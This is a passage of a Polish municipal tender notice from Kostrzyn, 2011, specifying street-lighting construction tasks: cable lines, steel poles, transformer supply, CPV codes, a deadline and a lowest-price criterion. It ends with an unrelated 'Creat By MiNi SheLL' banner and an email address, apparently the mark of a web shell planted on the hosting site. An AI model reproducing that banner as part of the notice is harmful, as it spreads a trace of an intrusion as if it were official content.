Wykonawca robót zobowiązany jest dokonać wszelkich wymaganych odbiorów technicznych w Enea Operator zakończonych protokołem odbioru i przedstawieniem go Inwestorowi. Wykonawca zobowiązany jest również do załatwienia wszelkich spraw związanych z podpisaniem przez Inwestora tj. Gminę Kostrzyn umowy o przyłączenie do sieci oraz umowy o dostarczenie energii elektrycznej z wskazanym przez Inwestora dostawcą energii celem założenia licznika energii elektrycznej.
Do zakresu zamówienia należy również:
- obsługa geodezyjna budowy,
- dokumentacja geodezyjna powykonawcza - 5 egz.
Szczegółowy zakres robót został określony w:
- projekcie budowlanym pod tytułem  Budowa oświetlenia ulicznego w miejscowości Kostrzyn os. Wrzesińskie, opracowanym w listopadzie 2010 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN,
-  specyfikacji technicznej wykonania i odbioru robót (zał. Nr  4 - do SIWZ - zad. 2), opracowanej  we wrześniu  2011  r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN ,
- przedmiarze robót  i kosztorysie ofertowym (zał. Nr 5 do SIWZ - zad. 2), opracowanych w dniu 18.07.2011 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.31.61.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Budowa oświetlenia os. Kórnickie-Grunwaldzkie w Kostrzynie obwód II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 - Budowa oświetlenia os. Kórnickie-Grunwaldzkie w Kostrzynie obwód II. Realizacja zadania polegać będzie na budowie linii kablowej nn 0,4kV wraz ze słupami oświetleniowymi w miejscowości Kostrzyn os. Kórnickie. Oprawy oświetleniowe zasilane będą z istniejącej stacji transformatorowej Andrzejewo nr 06 - 1030, w której znajduje się transformator o mocy 250kVA.  Ustawić słupy oświetleniowe stalowe typu SO 4/No c w ilości 30kpl; zastosować fundament stabilizujący, 
Do zakresu zamówienia należy również:
- obsługa geodezyjna budowy,
- dokumentacja geodezyjna powykonawcza - 5 egz.
Szczegółowy zakres robót został określony w :
- projekcie budowlanym pod tytułem  Budowa oświetlenia ulicznego w miejscowości Kostrzyn, os. Kórnickie, opracowanym w grudniu 2009 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN,
-  specyfikacji technicznej wykonania i odbioru robót (zał. Nr  4 - do SIWZ - zad. 3), opracowanej  we wrześniu  2011 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN ,
- przedmiarze robót  i kosztorysie ofertowym (zał. Nr 5 do SIWZ - zad. 3), opracowanych w dniu 18.07.2011 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.31.61.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 - Budowa oświetlenia nowe osiedle w Siekierkach obwód IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4 - Budowa oświetlenia nowe osiedle w Siekierkach obwód IV. Realizacja zadania polegać będzie na budowie linii kablowej nn 0,4kV wraz ze słupami oświetleniowymi w miejscowości Siekierki Wielkie. Oprawy oświetleniowe zasilane będą z istniejącej stacji transformatorowej oprawy oświetleniowe zasilane będą z istniejącej stacji transformatorowej (Siekierki Wielkie N-STSR 20-400 KK2 nr 06 - 1400 obwód IX, w której znajduje się transformator o mocy 63kVA  Słupy oświetleniowe stalowe typu SO 8-No  wraz z wysięgnikiem W12 w ilości 15kpl; zastosować fundament stabilizujący. na słupach zamontować oprawy oświetlenia ulicznego typu SGS 101/70 ze źródłem światła 70W. 
Do zakresu zamówienia należy również:
- obsługa geodezyjna budowy,
- dokumentacja geodezyjna powykonawcza - 5 egz.
Szczegółowy zakres robót został określony w:
- projekcie budowlanym pod tytułem  Budowa oświetlenia ulicznego w miejscowości Siekierki Wielkie, ul. Sosnowa, Klonowa, Wierzbowa, Akacjowa, Brzozowa, Bukowa, Świerkowa, Dębowa, Lipowa, opracowanym w październiku 2009 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN,
-  specyfikacji technicznej wykonania i odbioru robót (zał. Nr  4 - do SIWZ - zad. 4), opracowanej  we wrześniu  2011  r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN ,
- przedmiarze robót  i kosztorysie ofertowym (zał. Nr 5 do SIWZ - zad. 4), opracowanych w dniu 18.07.2011 r. przez FIRMĘ ENTRA - Przemysław Mroczek, ul. Andrzejewo 17, 62-025 KOSTRZYN..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.23.14.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com